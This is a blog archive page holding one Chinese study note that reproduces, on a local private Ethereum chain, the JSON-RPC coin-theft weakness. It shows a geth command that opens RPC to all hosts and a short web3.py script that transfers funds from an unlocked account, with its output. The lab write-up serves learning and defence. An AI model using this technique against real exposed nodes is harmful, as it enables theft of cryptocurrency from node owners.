<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/blog/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/blog/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/blog/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/blog/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta property="og:type" content="website">
<meta property="og:title" content="leveryd个人博客">
<meta property="og:url" content="https://looklook.gitee.io/archives/page/5/index.html">
<meta property="og:site_name" content="leveryd个人博客">
<meta property="og:locale" content="zh-Hans">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="leveryd个人博客">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/blog/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://looklook.gitee.io/archives/page/5/">





  <title>leveryd个人博客</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left 
  page-home">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/blog/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">leveryd个人博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/blog/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/blog/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/blog/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            
  <section id="posts" class="posts-expand">
    
      

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://looklook.gitee.io/blog/2019/01/05/以太坊rpc接口盗币漏洞复现/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="leveryd">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/blog/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="leveryd个人博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/blog/2019/01/05/以太坊rpc接口盗币漏洞复现/" itemprop="url">以太坊rpc接口盗币漏洞学习笔记</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-05T23:10:51+08:00">
                2019-01-05
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        
          
            <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>关于漏洞是什么，可以阅读参考中的<code>金钱难寐，大盗独行——以太坊 JSON-RPC 接口多种盗币手法大揭秘</code>。</p>
<p>因为不清楚最新的以太坊程序是否已不存在此问题，所以对这个安全漏洞做了一次本地环境的测试。</p>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><h2 id="搭建私链"><a href="#搭建私链" class="headerlink" title="搭建私链"></a>搭建私链</h2><p>根据参考中的的<code>如何搭建以太坊私有链</code>，基本没坑地在本地起了一个以太坊节点。</p>
<p>自己一开始使用–testnet参数，却好像因为不能同步测试网络的原因，区块链高度（eth.blockNumber）一直是0。最终就没在测试网络复现了。</p>
<p>如果不是mac，可以在geth容器里操作，后面的步骤还是参考<code>如何搭建以太坊私有链</code>。</p>
<p>进入geth容器命令行：</p>
<p><code>docker run -ti --name ethereum-node --entrypoint=&quot;/bin/sh&quot; -v /mnt/files/myethereum:/root -p 8546:8545 -p 30303:30303 ethereum/client-go</code></p>
<p>需要注意的地方：</p>
<ol>
<li>使用geth –datadir data0 –networkid 1108 –rpcaddr 0.0.0.0 –rpc –rpccorsdomain “<em>“ –rpcapi “web3,eth” –rpcvhosts=</em> console开放rpc端口</li>
<li>使用容器搭建环境，需要指定–entrypoint来进容器里</li>
</ol>
<h2 id="测试代码"><a href="#测试代码" class="headerlink" title="测试代码"></a>测试代码</h2><p>需要安装python3</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># coding:utf-8</span><br><span class="line">from web3 import Web3, HTTPProvider</span><br><span class="line">import time</span><br><span class="line">web3 = Web3(HTTPProvider(&apos;http://localhost:8545&apos;))</span><br><span class="line">eth = web3.eth</span><br><span class="line">print(web3.eth.blockNumber)</span><br><span class="line"># print(web3.eth.accounts)</span><br><span class="line">print(eth.getBalance(eth.accounts[0]))</span><br><span class="line">print(eth.getBalance(eth.accounts[1]))</span><br><span class="line">web3.eth.sendTransaction(&#123;&apos;to&apos;: eth.accounts[1], &apos;from&apos;: eth.accounts[0], &apos;value&apos;: 12345&#125;)</span><br></pre></td></tr></table></figure>
<h1 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h1><ol>
<li>新建两个账号</li>
<li>给账号一挖矿，拿钱</li>
<li><p>模拟攻击者调rpc接口偷账号一的钱到账户二 (没有解锁用户时)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">➜  /tmp python3 转账测试.py</span><br><span class="line">1539</span><br><span class="line">7694999999999994741030</span><br><span class="line">5258970</span><br><span class="line">Traceback (most recent call last):</span><br><span class="line">  File &quot;转账测试.py&quot;, line 15, in &lt;module&gt;</span><br><span class="line">    web3.eth.sendTransaction(&#123;&apos;to&apos;: eth.accounts[1], &apos;from&apos;: eth.accounts[0], &apos;value&apos;: 12345&#125;)</span><br><span class="line">  File &quot;/usr/local/lib/python3.7/site-packages/web3/eth.py&quot;, line 268, in sendTransaction</span><br><span class="line">    [transaction],</span><br><span class="line">  File &quot;/usr/local/lib/python3.7/site-packages/web3/manager.py&quot;, line 112, in request_blocking</span><br><span class="line">    raise ValueError(response[&quot;error&quot;])</span><br><span class="line">ValueError: &#123;&apos;code&apos;: -32000, &apos;message&apos;: &apos;authentication needed: password or unlock&apos;&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>模拟攻击者调rpc接口偷账号一的钱到账户二 (解锁用户时)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">personal.unlockAccount(eth.accounts[0])   解锁时间默认为300秒</span><br><span class="line">再运行python3 转账测试.py，此时交易就被提交上去了</span><br></pre></td></tr></table></figure>
</li>
<li><p>如此重复调用转账测试.py，区块链高度不断增加，账户一的余额越来越少</p>
</li>
</ol>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><ol>
<li>这个解锁用户后一段时间内无需密码是个功能，最新版的以太坊程序一样存在。</li>
<li>不太清楚真实世界里，unlockAccount是怎么发生的。</li>
</ol>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="!https//paper.seebug.org/656/">金钱难寐，大盗独行——以太坊 JSON-RPC 接口多种盗币手法大揭秘</a><br><a href="!https://learnblockchain.cn/2018/03/18/create_private_blockchain/">如何搭建以太坊私有链</a><br><a href="!http://www.hi-roy.com/2018/05/25/基于Docker的以太坊开发环境搭建/">基于Docker的以太坊开发环境搭建</a></p>

          
        
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      

      

      
      
        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  
  </article>


    
  </section>

  
  <nav class="pagination">
    <a class="extend prev" rel="prev" href="/blog/archives/page/4/"><i class="fa fa-angle-left"></i></a><a class="page-number" href="/blog/archives/">1</a><span class="space">&hellip;</span><a class="page-number" href="/blog/archives/page/4/">4</a><span class="page-number current">5</span><a class="page-number" href="/blog/archives/page/6/">6</a><span class="space">&hellip;</span><a class="page-number" href="/blog/archives/page/8/">8</a><a class="extend next" rel="next" href="/blog/archives/page/6/"><i class="fa fa-angle-right"></i></a>
  </nav>



          </div>
          


          

        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">leveryd</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/blog/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">leveryd</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/blog/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/blog/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/blog/js/src/motion.js?v=5.1.4"></script>



  
  

  

  


  <script type="text/javascript" src="/blog/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
